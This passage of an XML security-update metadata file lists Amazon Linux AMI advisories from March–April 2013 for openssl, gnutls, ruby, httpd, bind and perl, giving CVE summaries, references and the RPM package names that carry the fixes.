</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5519" title="" id="CVE-2012-5519" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0580.html" title="" id="RHSA-2013:0580" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="50.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-50.18.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-50.18.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="50.18.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-50.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-171</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-171: medium priority package update for openssl</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0169:
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle.
CVE-2013-0166:
A NULL pointer dereference flaw was found in the OCSP response verification in OpenSSL. A malicious OCSP server could use this flaw to crash applications performing OCSP verification by sending a specially-crafted response.
CVE-2012-4929:
It was discovered that the TLS/SSL protocol could leak information about plain text when optional compression was used. An attacker able to control part of the plain text sent over an encrypted TLS/SSL connection could possibly use this flaw to recover other portions of the plain text.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4929" title="" id="CVE-2012-4929" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0166" title="" id="CVE-2013-0166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169" title="" id="CVE-2013-0169" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0587.html" title="" id="RHSA-2013:0587" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0k-1.48.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0k-1.48.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0k-1.48.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0k-1.48.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0k-1.48.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0k-1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-172</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-172: medium priority package update for gnutls</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1619:
It was discovered that GnuTLS leaked timing information when decrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL server as a padding oracle.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1619" title="" id="CVE-2013-1619" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0588.html" title="" id="RHSA-2013:0588" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-utils" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-10.9.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-10.9.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-10.9.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-10.9.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-10.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-173</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-173: medium priority package update for ruby</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1821:
It was discovered that Ruby's REXML library did not properly restrict XML entity expansion. An attacker could use this flaw to cause a denial of service by tricking a Ruby application using REXML to read text nodes from specially-crafted XML content, which will result in REXML consuming large amounts of system memory.
CVE-2012-4481:
It was found that the RHSA-2011:0910 update did not correctly fix the CVE-2011-1005 issue, a flaw in the method for translating an exception message into a string in the Exception class. A remote attacker could use this flaw to bypass safe level 4 restrictions, allowing untrusted (tainted) code to modify arbitrary, trusted (untainted) strings, which safe level 4 restrictions would otherwise prevent.
CVE-2011-1005:
It was found that the RHSA-2011:0910 update did not correctly fix the CVE-2011-1005 issue, a flaw in the method for translating an exception message into a string in the Exception class. A remote attacker could use this flaw to bypass safe level 4 restrictions, allowing untrusted (tainted) code to modify arbitrary, trusted (untainted) strings, which safe level 4 restrictions would otherwise prevent.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1005" title="" id="CVE-2011-1005" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4481" title="" id="CVE-2012-4481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1821" title="" id="CVE-2013-1821" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0612.html" title="" id="RHSA-2013:0612" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby-ri" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-ri-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-libs" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-libs-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-static" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-static-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-irb" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-irb-1.8.7.371-2.25.amzn1.noarch.rpm</filename></package><package name="ruby" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-devel" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-devel-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-rdoc" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-rdoc-1.8.7.371-2.25.amzn1.noarch.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-debuginfo-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-ri" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-ri-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby-devel" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-devel-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby-libs" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-libs-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby-static" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-static-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-debuginfo-1.8.7.371-2.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-174</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-174: medium priority package update for httpd</title><issued date="2013-03-26 21:25:00" /><updated date="2014-09-15 22:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-4558:
Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
915884:
CVE-2012-4558 httpd: XSS flaw in mod_proxy_balancer manager interface
CVE-2012-3499:
Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
915883:
CVE-2012-3499 httpd: multiple XSS flaws due to unescaped hostnames
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3499" title="" id="CVE-2012-3499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558" title="" id="CVE-2012-4558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd" version="2.2.24" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.24" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.24" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.24" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.24-1.29.amzn1.noarch.rpm</filename></package><package name="mod_ssl" version="2.2.24" release="1.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.24" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.24" release="1.29.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.24-1.29.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.24" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.24-1.29.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.24" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.24-1.29.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.24" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.24-1.29.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.24" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.24-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-175</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-175: medium priority package update for httpd24</title><issued date="2013-03-26 21:29:00" /><updated date="2014-09-15 22:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-4558:
Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
915884:
CVE-2012-4558 httpd: XSS flaw in mod_proxy_balancer manager interface
CVE-2012-3499:
Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
915883:
CVE-2012-3499 httpd: multiple XSS flaws due to unescaped hostnames
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3499" title="" id="CVE-2012-3499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558" title="" id="CVE-2012-4558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ssl" version="2.4.4" release="2.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.4" release="2.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.4" release="2.41.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.4-2.41.amzn1.noarch.rpm</filename></package><package name="httpd24-devel" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.4" release="2.41.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.4" release="2.41.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.4-2.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-176</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-176: important priority package update for bind</title><issued date="2013-04-04 11:09:00" /><updated date="2014-09-15 22:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2266:
A denial of service flaw was found in the libdns library. A remote attacker could use this flaw to send a specially-crafted DNS query to named that, when processed, would cause named to use an excessive amount of memory, or possibly crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2266" title="" id="CVE-2013-2266" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0689.html" title="" id="RHSA-2013:0689" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-177</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-177: medium priority package update for perl</title><issued date="2013-04-04 11:10:00" /><updated date="2014-09-15 22:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1667:
A denial of service flaw was found in the way Perl's rehashing code implementation, responsible for recalculation of hash keys and redistribution of hash content, handled certain input. If an attacker supplied specially-crafted input to be used as hash keys by a Perl application, it could cause excessive memory consumption.
CVE-2012-6329:
It was found that the Perl Locale::Maketext module, used to localize Perl applications, did not properly handle backslashes or fully-qualified method names. An attacker could possibly use this flaw to execute arbitrary Perl code with the privileges of a Perl application that uses untrusted Locale::Maketext templates.
CVE-2012-5526:
It was found that the Perl CGI module, used to handle Common Gateway Interface requests and responses, incorrectly sanitized the values for Set-Cookie and P3P headers. If a Perl application using the CGI module reused cookies values and accepted untrusted input from web browsers, a remote attacker could use this flaw to alter member items of the cookie or add new items.
CVE-2012-5195:
A heap overflow flaw was found in Perl. If a Perl application allowed user input to control the count argument of the string repeat operator, an attacker could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5195" title="" id="CVE-2012-5195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5526" title="" id="CVE-2012-5526" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329" title="" id="CVE-2012-6329" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1667" title="" id="CVE-2013-1667" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0685.html" title="" id="RHSA-2013:0685" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Compress-Raw-Zlib" version="2.023" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Raw-Zlib-2.023-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Archive-Tar" version="1.58" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Archive-Tar-1.58-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-CGI" version="3.51" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CGI-3.51-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-devel" version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.28" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-ExtUtils-Embed-1.28-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-CPAN" version="1.9402" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CPAN-1.9402-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Pod-Escapes-1.04-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-parent" version="0.221" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-parent-0.221-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Loaded" version="0.02" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Loaded-0.02-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Pluggable" version="3.90" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Pluggable-3.90-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.18" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Module-CoreList-2.18-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Archive-Extract" version="0.38" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Archive-Extract-0.38-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Zlib" version="1.09" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-IO-Zlib-1.09-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Base" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Base-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Log-Message-Simple" version="0.04" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Log-Message-Simple-0.04-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-CPANPLUS" version="0.88" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CPANPLUS-0.88-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Test-Simple" version="0.92" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Test-Simple-0.92-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-suidperl" version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-suidperl-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-debuginfo" version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Params-Check" version="0.26" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Params-Check-0.26-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Compress-Raw-Bzip2" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Term-UI" version="0.20" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Term-UI-0.20-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.27" release="130.17.amzn1" 